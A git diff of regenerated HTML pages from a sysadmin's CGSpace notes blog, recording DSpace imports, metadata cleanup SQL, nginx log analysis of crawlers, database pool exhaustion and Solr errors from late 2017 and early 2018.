<pre><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
</code></pre><ul>
<li>The final code for the JNDI work in the Ansible infrastructure scripts is here: <a href="https://github.com/ilri/rmg-ansible-public/commit/1959d9cb7a0e7a7318c77f769253e5e029bdfa3b">https://github.com/ilri/rmg-ansible-public/commit/1959d9cb7a0e7a7318c77f769253e5e029bdfa3b</a></li>
@ -687,7 +687,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
<li>Linode alerted that CGSpace was using high CPU this morning around 6 AM</li>
<li>I&rsquo;m playing with reading all of a month&rsquo;s nginx logs into goaccess:</li>
</ul>
<pre><code># find /var/log/nginx -type f -newermt &quot;2017-12-01&quot; | xargs zcat --force | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># find /var/log/nginx -type f -newermt &#34;2017-12-01&#34; | xargs zcat --force | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>I can see interesting things using this approach, for example:
<ul>
@ -708,23 +708,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
<ul>
<li>Looking at some old notes for metadata to clean up, I found a few hundred corrections in <code>cg.fulltextstatus</code> and <code>dc.language.iso</code>:</li>
</ul>
<pre><code># update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
<pre tabindex="0"><code># update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
UPDATE 5
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
DELETE 17
# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
# update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
UPDATE 49
# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
# update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
UPDATE 4
# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
# update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
UPDATE 16
# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
# update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
UPDATE 9
# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
# update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
UPDATE 1
# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
# update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
UPDATE 5
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
DELETE 20
</code></pre><ul>
<li>I need to figure out why we have records with language <code>in</code> because that&rsquo;s not a language!</li>
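<li>Something like this should list the offending items (a sketch re-using the <code>dc.language.iso</code> field ID from the queries above):</li>
</ul>
<pre><code># select resource_id, text_value from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value='in';
</code></pre><ul>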
@ -735,7 +735,7 @@ DELETE 20
<li>Uptime Robot noticed that the server went down for 1 minute a few hours later, around 9AM</li>
<li>Here&rsquo;s the XMLUI logs:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;30/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;30/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
637 207.46.13.106
641 157.55.39.186
715 68.180.229.254
@ -751,7 +751,7 @@ DELETE 20
<li>They identify as &ldquo;com.plumanalytics&rdquo;, which Google says is associated with Elsevier</li>
<li>They only seem to have used one Tomcat session so that&rsquo;s good, I guess I don&rsquo;t need to add them to the Tomcat Crawler Session Manager valve:</li>
</ul>
<pre><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
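<li>For reference, the valve itself is a one-line addition inside the <code>Host</code> element of Tomcat&rsquo;s <em>server.xml</em>, shown here with its default <code>crawlerUserAgents</code> regex:</li>
</ul>
<pre><code>&lt;Valve className=&quot;org.apache.catalina.valves.CrawlerSessionManagerValve&quot;
       crawlerUserAgents=&quot;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*&quot; /&gt;
</code></pre><ul>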
<li>216.244.66.245 seems to be moz.com&rsquo;s DotBot</li>
@ -761,7 +761,7 @@ DELETE 20
<li>I finished working on the 42 records for CCAFS after Magdalena sent the remaining corrections</li>
<li>After that I uploaded them to CGSpace:</li>
</ul>
<pre><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat -m ccafs.map &amp;&gt; ccafs.log
<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat -m ccafs.map &amp;&gt; ccafs.log
</code></pre>
@ -783,15 +783,15 @@ DELETE 20
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -23,11 +23,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
I notice this error quite a few times in dspace.log:
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
And there are many of these errors every day for the past month:
$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -99,11 +99,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
I notice this error quite a few times in dspace.log:
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
And there are many of these errors every day for the past month:
$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -150,7 +150,7 @@ dspace.log.2018-01-02:34
Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -180,12 +180,12 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -231,7 +231,7 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
<p class="blog-post-meta">
<time datetime="2018-01-02T08:35:54-08:00">Tue Jan 02, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -244,19 +244,19 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li>
<li>And just before that I see this:</li>
</ul>
<pre><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
</code></pre><ul>
<li>Ah hah! So the pool was actually empty!</li>
<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li>
<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li>
<li>I notice this error quite a few times in dspace.log:</li>
</ul>
<pre><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>And there are many of these errors every day for the past month:</li>
</ul>
<pre><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -308,7 +308,7 @@ dspace.log.2018-01-02:34
<li>I woke up to more ups and downs of CGSpace; this time UptimeRobot noticed a few rounds of downtime of a few minutes each and Linode also sent an alert about high CPU load from 12 to 2 PM</li>
<li>Looks like I need to increase the database pool size again:</li>
</ul>
<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -319,7 +319,7 @@ dspace.log.2018-01-03:1909
<ul>
<li>The active IPs in XMLUI are:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;3/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
607 40.77.167.141
611 2a00:23c3:8c94:7800:392c:a491:e796:9c50
663 188.226.169.37
@ -336,12 +336,12 @@ dspace.log.2018-01-03:1909
<li>This appears to be the <a href="https://github.com/internetarchive/heritrix3">Internet Archive&rsquo;s open source bot</a></li>
<li>They seem to be re-using their Tomcat session so I don&rsquo;t need to do anything to them just yet:</li>
</ul>
<pre><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2
</code></pre><ul>
<li>The API logs show the normal users:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;3/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
32 207.46.13.182
38 40.77.167.132
38 68.180.229.254
@ -356,12 +356,12 @@ dspace.log.2018-01-03:1909
<li>In other related news I see a sizeable number of requests coming from python-requests</li>
<li>For example, just in the last day there were 1700!</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -c python-requests
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -c python-requests
1773
</code></pre><ul>
<li>But they come from hundreds of IPs, many of which are 54.x.x.x:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail -n 30
9 54.144.87.92
9 54.146.222.143
9 54.146.249.249
@ -402,7 +402,7 @@ dspace.log.2018-01-03:1909
<li>CGSpace went down and up a bunch of times last night and ILRI staff were complaining a lot</li>
<li>The XMLUI logs show this activity:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;4/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;4/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
968 197.211.63.81
981 213.55.99.121
1039 66.249.64.93
@ -416,12 +416,12 @@ dspace.log.2018-01-03:1909
</code></pre><ul>
<li>Again we ran out of PostgreSQL database connections, even after bumping the pool max active limit from 50 to 75 to 125 yesterday!</li>
</ul>
<pre><code>2018-01-04 07:36:08,089 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2018-01-04 07:36:08,089 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-256] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:125; busy:125; idle:0; lastwait:5000].
</code></pre><ul>
<li>So for this week that is the number one problem!</li>
</ul>
<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -436,7 +436,7 @@ dspace.log.2018-01-04:1559
<li>Peter said that CGSpace was down last night and Tsega restarted Tomcat</li>
<li>I don&rsquo;t see any alerts from Linode or UptimeRobot, and there are no PostgreSQL connection errors in the dspace logs for today:</li>
</ul>
<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -446,13 +446,13 @@ dspace.log.2018-01-05:0
<li>Daniel asked for help with their DAGRIS server (linode2328112) that has no disk space</li>
<li>I had a look and there is one Apache 2 log file that is 73GB, with lots of this:</li>
</ul>
<pre><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &quot;9-16-1-RV.doc&quot; in &quot;/home/files/journals/6//articles/9/&quot;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
<pre tabindex="0"><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &#34;9-16-1-RV.doc&#34; in &#34;/home/files/journals/6//articles/9/&#34;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
</code></pre><ul>
<li>I will delete the log file for now and tell Danny</li>
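<li>Since Apache keeps the log file open, deleting it will not actually free the space until the service is reloaded, so truncating it in place is safer (the path here is hypothetical):</li>
</ul>
<pre><code># truncate -s 0 /var/log/apache2/dagris-error.log
</code></pre><ul>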
<li>Also, I&rsquo;m still seeing a hundred or so of the &ldquo;ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer&rdquo; errors in dspace logs, so I need to search the dspace-tech mailing list to see what the cause is</li>
<li>I will run a full Discovery reindex in the mean time to see if it&rsquo;s something wrong with the Discovery Solr core</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 110m43.985s
@ -465,7 +465,7 @@ sys 3m14.890s
<ul>
<li>I&rsquo;m still seeing Solr errors in the DSpace logs even after the full reindex yesterday:</li>
</ul>
<pre><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1983+TO+1989]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>I posted a message to the dspace-tech mailing list to see if anyone can help</li>
</ul>
@ -474,13 +474,13 @@ sys 3m14.890s
<li>Advise Sisay about blank lines in some IITA records</li>
<li>Generate a list of author affiliations for Peter to clean up:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 4515
</code></pre><h2 id="2018-01-10">2018-01-10</h2>
<ul>
<li>I looked to see what happened to this year&rsquo;s Solr statistics sharding task that should have run on 2018-01-01 and of course it failed:</li>
</ul>
<pre><code>Moving: 81742 into core statistics-2010
<pre tabindex="0"><code>Moving: 81742 into core statistics-2010
Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2010
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2010
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
@ -526,7 +526,7 @@ Caused by: java.net.SocketException: Connection reset
</code></pre><ul>
<li>DSpace Test has the same error but with creating the 2017 core:</li>
</ul>
<pre><code>Moving: 2243021 into core statistics-2017
<pre tabindex="0"><code>Moving: 2243021 into core statistics-2017
Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2017
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2017
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
@ -553,27 +553,27 @@ Caused by: org.apache.http.client.ClientProtocolException
<li>I can apparently search for records in the Solr stats core that have an empty <code>owningColl</code> field using this in the Solr admin query: <code>-owningColl:*</code></li>
<li>On CGSpace I see 48,000,000 records that have an <code>owningColl</code> field and 34,000,000 that don&rsquo;t:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:48476327,&quot;start&quot;:0,&quot;docs&quot;:[
$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:34879872,&quot;start&quot;:0,&quot;docs&quot;:[
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:48476327,&#34;start&#34;:0,&#34;docs&#34;:[
$ http &#39;http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:34879872,&#34;start&#34;:0,&#34;docs&#34;:[
</code></pre><ul>
<li>I tested the <code>dspace stats-util -s</code> process on my local machine and it failed the same way</li>
<li>It doesn&rsquo;t seem to be helpful, but the dspace log shows this:</li>
</ul>
<pre><code>2018-01-10 10:51:19,301 INFO org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
<pre tabindex="0"><code>2018-01-10 10:51:19,301 INFO org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
2018-01-10 10:51:19,301 INFO org.dspace.statistics.SolrLogger @ Moving: 3821 records into core statistics-2016
</code></pre><ul>
<li>Terry Brady has written some notes on the DSpace Wiki about Solr sharding issues: <a href="https://wiki.lyrasis.org/display/%7Eterrywbrady/Statistics+Import+Export+Issues">https://wiki.lyrasis.org/display/%7Eterrywbrady/Statistics+Import+Export+Issues</a></li>
<li>Uptime Robot said that CGSpace went down at around 9:43 AM</li>
<li>I looked at PostgreSQL&rsquo;s <code>pg_stat_activity</code> table and saw 161 active connections, but no pool errors in the DSpace logs:</li>
</ul>
<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-10
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-10
0
</code></pre><ul>
<li>The XMLUI logs show quite a bit of activity today:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;10/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
951 207.46.13.159
954 157.55.39.123
1217 95.108.181.88
@ -587,18 +587,18 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=js
</code></pre><ul>
<li>The user agent for the top six or so IPs are all the same:</li>
</ul>
<pre><code>&quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&quot;
<pre tabindex="0"><code>&#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34;
</code></pre><ul>
<li><code>whois</code> says they come from <a href="http://www.perfectip.net/">Perfect IP</a></li>
<li>I&rsquo;ve never seen those top IPs before, but they have created 50,000 Tomcat sessions today:</li>
</ul>
<pre><code>$ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep -E &#39;(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
49096
</code></pre><ul>
<li>Rather than blocking their IPs, I think I might just add their user agent to the &ldquo;badbots&rdquo; zone with Baidu, because they seem to be the only ones using that user agent:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
/537.36&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
/537.36&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
6796 70.36.107.50
11870 70.36.107.190
17323 70.36.107.49
@ -608,13 +608,13 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=js
</code></pre><ul>
<li>I added the user agent to nginx&rsquo;s badbots limit req zone but upon testing the config I got an error:</li>
</ul>
<pre><code># nginx -t
<pre tabindex="0"><code># nginx -t
nginx: [emerg] could not build map_hash, you should increase map_hash_bucket_size: 64
nginx: configuration file /etc/nginx/nginx.conf test failed
</code></pre><ul>
